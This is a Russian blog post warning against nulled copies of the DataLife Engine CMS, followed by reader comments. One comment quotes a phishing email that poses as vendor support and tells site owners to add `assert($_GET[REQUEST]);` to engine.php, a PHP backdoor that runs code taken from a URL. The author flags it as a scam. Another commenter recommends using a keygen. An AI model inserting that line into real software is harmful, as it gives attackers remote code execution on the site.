• Автор:

    Flesha
  • Добавлено:

    окт 19, 2014
  • Комментариев:

    13
  • Просмотров:

    1 860

DataLife Engine: несколько слов о значении легального ПО

DataLife Engine: несколько слов о значении легального ПО

DataLife Engine: несколько слов о значении легального ПО на простом примере. Программное обеспечение DataLife Engine (DLE) имеет коммерческую основу, поэтому оно не получило официального бесплатного распространения на просторах интернета. Скачать его демоверсию можно по ссылке, приобретя скрипт. Любой другой вариант, распространяемый в сети, считается нелегальным и часто обозначается надписью "Nulled".
Что делать, если вы самостоятельно обнаружили факт нарушения в виде применения нелегального скрипта? Либо удалить его с имеющегося сервера и установить взамен иную программу с официальным бесплатным распространением, либо купить лицензию на данный скрипт.

Нуленная и варез. Что это за версии и откуда они берутся?

Названия обоих вариантов походят от слов «nulled» и «warez». Последнее тесно связано с понятием «software», обозначающим ПО (программное обеспечение). Иными словами, речь идет о программных продуктах, распространяемых пиратским способом с отключением защитных систем, блокирующих нелегальное применение. «Nulled» (нуленная версия) – это скрипт с удаленными компонентами защиты (специально обнуленными для использования неофициально) и отсутствием сведений об авторстве.
Пираты, маскируясь под добросовестных пользователей, вполне легально покупают разрешенную версию или же воруют ее у счастливых обладателей, удаляют защитные компоненты, отвечающие за копирование, и стирают все копирайты (сведения о реальных разработчиках), подменяя их своими. Такой скрипт распространяется в корыстных целях и используется для наживы.
Памятка: Случаи, когда происходит реализация неофициальных копий программного обеспечения под видом официальных, встречаются довольно часто. Предоставляемый при этом ключ выглядит так e1c08ddcad57a451223798005512de51. Однако легальный формат ключа иной, а именно IHVHN-4CG2P-694K6-EQ2Q8-2NKGQ, и вовсе не напоминает приведенный выше беспорядочный набор цифр и букв. Нелегальный код или хеш - это прямое указание на мошенническую схему, поэтому незамедлительно требуйте обратно свои деньги.

Чем грозит использование нуленных или варез версий?

Нелегальные компьютерные продукты бывают напичканы вирусами и шпионами, посредством которых пираты осуществляют свои неблаговидные намерения. Известны случаи встраивания в систему вредоносных скриптов, а когда пользователь создавал на их основе свой ресурс, то сталкивался с шантажом или попросту терял всю свою работу.
Пираты часто нарушают целостное функционирование скриптов, удаляя из них защитные компоненты, так как не осведомлены обо всех нюансах, с которыми связана бесперебойная работа системы. Нелегальные программы ведут себя нестабильно, сбоят и способны превратить даже самый четкий сайт в непредсказуемый и совершенно непригодный интернет-мусор.
При использовании нелегальных скриптов пользователь нарушает закон и подпадает под действие уголовного кодекса. А созданный на их основе сайт подлежит удалению как датацентром, так хостером, если авторы системы выступят с соответствующим требованием.
Пользователь пиратского скрипта автоматически лишен техподдержки от создателей оригинальной версии. Его обязательно заблокируют на самом проекте и избавят от возможности получать актуальную информацию по развитию, обновлению и прочими полезными изменениями.

Вред, наносимый распространением нуленных версий ПО

Ущерб от распространения неофициальных скрипт-копий, который терпят их создатели, очень серьезен. И распространяется он на всех участников цепочки. Суть в том, что большая часть денег, выручаемых от официальной продажи программных продуктов, вкладывается в его дальнейшую разработку, улучшение, совершенствование и поддержку. Из этой суммы оплачивается также работа дизайнеров и программистов, сам сервер, его обеспечение и функционирование. Существует и ряд других необходимых статей расходов, которые оголяются. Поэтому все мы становимся невольными жертвами нечистоплотных действий – и разработчики, и пользователи, и клиенты. dle
Вернуться

Комментарии:


  1. Flesha → 19 октября 2014 11:19
    Статья несет информационный характер в ознакомительных целях и не более.
    Сама статья очень старая, зимой был сделан рерайт, нашел только сейчас.
  2. websantix → 19 октября 2014 12:22
    спасибо, очень познавательно. Но Мид Тим - никогда не подсовывали вирусняков и кражи номеров, кодов и т.д. - ничего не пропало за всё время. Работаем уже 4 года с ними ^_^ laugh
    и тут всё в порядке - ничего не пропало.
    Спасибо за статью.
  3. cardan → 19 октября 2014 12:31
    БРЕД КАКОЙТА!
  4. Flesha → 19 октября 2014 12:50
    Статья для новичков.
    Если скачивали с сайта мидтим, тогда все нормально.
    Стоило с других сайтов про dle скачать дистрибутив от имени мидтим - ломались сайты и ору было до кучи. Раньше было весело wink
  5. sexo → 19 октября 2014 13:33
    Лучше взять оригинал скрипта и применить кейген, таких сайтов у меня 22 штуки и без проблем.
  6. konak → 19 октября 2014 14:06
    В первых порах я думаю все пользуются пиратской копией. Но когда извините у вас 22 сайта и на них вы зарабатываете денежки нужно купить лицензионную копию.
    Я тоже когда толька начинал использовал пиратской копией, а сейчас у меня лицензионная и этим я горжусь!
  7. Flesha → 19 октября 2014 15:49
    Лучше не потакать разработчиков деньгами, которые украли код этого движка, а потом доказывать что есть документы. А если я не зарабатываю на сайте, то мне не покупать?
  8. sexo → 19 октября 2014 17:23
    Да нет у них документов. сам ДЛЕ зареган на какого то немца в России и какой то Андрей имеет доверенность на продажу. А знайте почему такая фигня? Потому, что налоги не платить от прибили. Вы понимаете на сколько это падло? В принципе закон не нарушается, но этот человек(продавец скрипта) мафиози.
  9. Flesha → 19 октября 2014 17:41
    Вместо того, чтобы тратить деньги на рассылку писем с баснями о судебных угрозах - делали бы существенные изменения в релизах. Мне около 40 писем пришло, кому больше?
  10. sexo → 19 октября 2014 18:33
    У меня засекли только 1 сайт и прислали письмо, я их просто послал на куй. а еще лучше - просто не ответить и все.
  11. remo → 19 октября 2014 18:39
    Сегодня получил письмо от support@dle-news.ru ))

    Данное письмо вам отправил support@dle-news.ru с сайта https://ххххх.info/

    ------------------------------------------------
    Текст сообщения
    ------------------------------------------------

    Здравствуйте, уважаемый клиент!


    Благодарим Вас за использование на Вашем сайте хххххх.info нашего ПО «CMS DataLife Engine - Система управления сайтами».

    Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

    По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

    Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: ххххххх.info/engine/engine.php и в самое начало файла после строчки:

    <?php

    добавьте:

    assert($_GET[REQUEST]);



    С уважением,

    Служба поддержки «DataLife Engine»

    IP адрес отправителя: 162.244.33.213
  12. Flesha → 19 октября 2014 18:57
    remo
    Это рассылка мошенников, вчера читал на dle-faq про это.
    Так, что нечего менять и вестись на это не надо!
    Человек по имени support@dle-news.ru laugh
  13. Arsen → 19 октября 2014 20:52
    Я недавно приобрел Легальную копию DLE. И перед покупкой запросил весь пакет документов подтверждающие права и налоговые оплаты. В течении двух дней мне на почту пришло письмо со всеми документами заверенные нотариально. Я проверил номера сертификатов и они оказались поделены. Если вы клипаете ГС то используйте нулед как раньше я и делал. А сейчас у меня хороший СДЛ с ежемесячной прибылью 40000руб. Поэтому и купил оригинал так как проблем не хотелось иметь. Да и забыл что такое качать модули которые распространяются платно. Лучше потратить тех 500руб. и Быть уверенным что там не будет шела.
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.